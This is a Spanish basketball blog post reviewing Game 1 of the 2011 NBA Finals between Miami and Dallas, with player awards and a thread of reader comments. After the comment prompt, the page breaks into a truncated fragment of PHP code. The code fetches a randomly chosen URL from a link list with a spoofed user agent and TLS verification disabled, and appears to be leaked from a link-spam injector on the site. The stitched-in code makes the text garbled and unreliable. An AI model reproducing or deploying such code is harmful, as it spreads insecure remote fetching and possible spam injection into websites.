La Gran Final (31/05/2011): Ventaja de campo

01 de June de 2011 por TheDeerHunter

Los Heat toman la delantera en el último sprint por el anillo.

Dos datos:

– No han perdido ningún partido en el American Airlines Arena de Miami durante esta postemporada. Han ganado 3 de visitante, casualmente las eliminatorias superadas.
– Dallas nunca ha ganado allí en playoffs.

    No sabemos si el clima de Florida afecta el pulso de los tejanos, pero ayer los Mavericks fallaron en bastantes aspectos donde no habían fallado hasta la fecha. Probablemente los locales también tendrán buena parte de culpa de ello. Si la segunda unidad había sido una de las principales armas de los Mavs anoche resultó un despropósito. Terry se apagó en su primera entrada, cuando se llevó un buen trastazo en una defensa al límite de LeBron. A partir de ahí apagón: 3 de 10 del propio Terry, 1 de 8 de Barea y 0 de 3 de Stojakovic. Haywood contribuyó a la fiesta fallando un mate sólo debajo del aro. Su único lanzamiento. Como consecuencia, el porcentaje de tiro, que había sido la principal virtud, cayó un 10% y registraron su segunda peor anotación de lo que va de postemporada.

    El segundo factor decisivo fue la diferencia de rebotes en contra. La cifra de -10 suele ser suponer una condena en playoffs y más en un partido trabado como el de ayer, con mucho tiro exterior y no excesivo acierto general. Chandler con problemas de faltas se quedó en 4, habiendo promediado más de 9 en  estos playoffs. La producción del Big Three resultó decisiva en ese aspecto, bien ayudados por Haslem y Mike Miller.

    Nowitki, lesionado del dedo corazón de su mano izquierda, cumplió. Marion hizo mucho daño marcado por Miller. Pero todo lo demás falló. Aún así se fueron ganando al descanso y empezaron a hincar la rodilla con un fade away imposible de LeBron desde el triple para cerrar el tercer cuarto. Al rey le entró todo lo que podía entrar anoche y alguna otra que no podía. A los Heat se les da bien llegar desde atrás en las segundas partes.

    Punto para Miami y el anillo de LeBron más cerca.

    PREMIOS

    MVP: Salvo monumental sorpresa es más que probable que los días que gane Miami destaquemos en este apartado a Lebron James y Dwyane Wade. Anoche, el primero anotó 24 puntos, capturó 9 rebotes y repartió 5 asistencias mientras que Wade se fue a los 22 puntos, 10 rebotes y 6 asistencias.

    Sorpresa: Nos hartamos a decir que cualquier equipo se merendará a los Heat en el juego interior y estos no hacen más que demostrarnos que estamos equivocados. Anoche los Heat cogieron 10 rebotes más que su rival. Y eso que su pívot titular es Joel Anthony.

    Decepción: En las pasadas series el banquillo de Dallas ha sido clave para conseguir victorias pero anoche no podemos decir que jugaran su mejor partido. Tan soló anotó 17 puntos con un 18’1% de acierto en el tiro.

    Esfuerzo en vano: Si Dallas pierde, Dirk Nowitzki se lleva el premio. El alemán fue el mejor de su equipo gracias a sus 27 puntos y 8 rebotes aunque no estuvo tan acertado debido, en parte, a una lesión que se hizo en un dedo de su mano izquierda. Shawn Marion, con 16 puntos, 10 rebotes y 4 asistencias, también fue de los destacados.

    Imágenes | AP Photos / Getty Images

    Comenta

    15 comentarios a esta entrada

    1. Sr. Lagarto dice:
      #1

      Ay, ayiayaii, que veo venir el anillo del antipático LeBron.

        Citar

    2. jas dice:
      #2

      asdfwwesdfwaeg maldición!!!

        Citar

    3. HisRoyalAirness dice:
      #3

      Por qué en la prensa aparece por todas partes la foto de Lebron a modo líder? el partido fue tanto de Wade como de Lebron (en mi opinión más de Wade).

      Partido feo y tosco. El mate que falla Haywood es un absoluto despropósito

        Citar

    4. xapa_croack dice:
      #4

      Pues si Wade sacó lo mejor en la 2a parte, como dijo Daimiel “estos heats parecen el 4×100 de Jamaica”

        Citar

    5. GreenPride dice:
      #5

      Empezaron las finales y a Dallas les pilló el paso cambiado.
      Repasando las claves que me atreví a dar en el análisis de las Finales los Mavs lo hicieron de pena: Murieron en los rebotes, se quedaron atrás en los triples y su banquillo fue claramente superado por el de los Heat. Estos en teoría tenían que ser de los puntos donde se basará una hipotética victoria de Dallas pero perdiendo estas 3 premisas y con un Big Three totalmente entonado los Mavs lo tendrán en chino para ganar la eliminatoria.
      Nowitzki jugó un buen partido pero sus porcentajes no fueron tan bestiales como en las eliminatorias anteriores así que punto también para los Heat. Sólo él y Marion parecieron provocar dolores de cabeza a la defensa Heat y si no espabilan Barea, Stojakovic, Terry y Chandler se carga de faltas tendrán poco que hacer.
      Por los Heat buena defensa de conjunto aunque menos robos y contraataques. Todo el Big Three funcionando con un LeBron fenomenal sin forzar tiros, un Wade en buena sintonía con él y Bosh aportando también bastante con las ayudas de Haslem, Miller y Chalmers desde el banco. Gran partido reboteador de todos.
      Los Heat toman ventaja en un partido bastante feo y con muy malos porcentajes en general. Si las series se mueven así será difícil que los Mavs puedan ganar. Necesitan mejores tiros y que sus lanzadores de media-larga distancia metan mucho más y por supuesto igualar o ganar el rebote. Veremos si son capaces de reaccionar. De momento yo no les doy todavía por muertos

        Citar

    6. Denise dice:
      #6

      Es normal que se destaque a Lebron. Es el lider del equipo y va a ser el futuro MVP. En la mayoría de los partidos ajustados, ha sido él quién le ha sacado a los Heat las castañas del fuego, y la pedazo serie que se ha marcado ante los Bulls en todo el careto de Rose es imposible de olvidar.
      Con el mejor jugador de la NBA, con dos enormes escuderos como Wade y Bosh, y con el resto defendiendo a muerte atrás, es casi imposible que a los Heat se les escape el anillo.
      No quito mérito al titulo del Oeste conseguido por los Mavs, pero por las características de los jugadores, creo que los Thunder le plantarían cara mejor a los Heat que lo que pueden hacer los Mavs..(y los Lakers of course).

        Citar

    7. Ru dice:
      #7

      Se retira Shaq!

        Citar

    8. joa dice:
      #8

      Se retiro Shaq!!!! Lástima que no estuviera en estos playoff con los Celtics. Seguro que ahora se pone a tomar (mas) pepsi, unas reebok y a la canchita de la esquina a jugar. Un grande!

        Citar

    9. Txusma dice:
      #9

      Dios mio! Aunque sabes que a todo jugar le llega su momento no deja de sorprender. Cuando se retiren Duncan, Garnett o Kobe voy a llorar toda la noche.

        Citar

    10. Javijaen dice:
      #10

      Partido raro sí el de la pasada noche, pero si el banquillo de Heat es mejor que el de Mavs apaga y vámonos. Creo que les pudo a los de Dallas el ambiente y el arbitraje, así como las ganas de tumbar a Lebron. Vaya partidito de James y Wade por cierto. Los Mavs funcionaron muy bien como equipo hasta el último cuarto, donde el triple matador de final de tercer cuarto les hizo mucho más daño que los 3 puntitos. Yo tampoco los doy por muertos, pero los Heat parecen llegar con un plus a la final. Por cierto, 2 puntitos de Howard en 8 minutos, ver para creer jejejeje…

        Citar

    11. HisRoyalAirness dice:
      #11

      Denise no estoy en absoluto de acuerdo con lo de que Lebron es el líder del equipo, en qué te basas? Los números en RS son practicamente calcados (y es evidente la superioridad física y los 10 centímetros adicionales de Lebron) y en PO otro tanto de lo mismo. 3 partidos seguidos ante los Celtics Wade estuvo promediando más de 20 puntos en la primera mitad del partido y, salvo contra Bulls y último partido contra Celtics era el más eficiente en el “clutch time”.
      Repito lo dicho anteriormente que no me parece ninguna proeza cubrir tiros exteriores de Rose en los 5 últimos minutos con tal diferencia de tamaño.

      Wade nunca será escudero de nadie, es su equipo, es el capitán y Lebron siempre irá un anillo por detrás de él. Hablamos de un tipo capaz de ser MVP de las finales jugando junto a Shaq (Kobe no).

      Hacer un par de buzzer-beaters (no game winners, por cierto) te hacen mejor que los demás? Entonces Robert Horry sería el mejor jugador de todos los tiempos

        Citar

    12. Blade Petrovic dice:
      #12

      Pues que lástima porque era un tío entrañable quedaba más espectaculo….Un verdadero fenómeno y seguro que sera HOF,uno de los cinco mejores pívots de la historia.
      Concuerdo con lo que dice
      Hisroyalairness por hacer games winners no eres el mejor sino fisher sería un super buen jugador por el canastón a falta de 0,04 segundos

        Citar

    13. Blade Petrovic dice:
      #13

      Ahh y segun el sport (espero que sea verdad)RICKY A LA NBA .en mi opinión lo hace bien porque sada le estaba quitando el puesto

        Citar

    14. HisRoyalAirness dice:
      #14

      Creo que a Ricky le beneficiará enormemente el juego rápido de la NBA y el ventajón que tiene es que llega a un equipo joven, sin urgencias y en el que, en principio, podrìa hasta ser titular.
      Creo que el de El Masnou necesitaba un cambio de aires.
      Apuesto a que entra en los quintetos de rookies

        Citar

    15. Denise dice:
      #15

      Yo no le quito méritos a Wade, si obviamente es un jugón, pero para mi el lider es Lebron. Es quien suele romper el partido a favor de los Heat, el más regular, el más consistente, el más completo y el que más aporta en todos los sentidos del juego, todo ello sin quitar méritos a Wade como ya he dicho.
      La entrada con 2+1 de Lebron que sentencia y rompe el partido, me parece increible, no me canso de verla.
      Estoy seguro que si Miami gana será para Lebron el MVP

      A Ricky le beneficia el juego rápido, y la mayoría de los puntos que anote serán así, al contragolpe; en estático deja bastante que desear. Por el estilo de juego en la NBA, tendrá una media anotadora más alta allí que aquí.

        Citar

    Deja un comentario

    html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>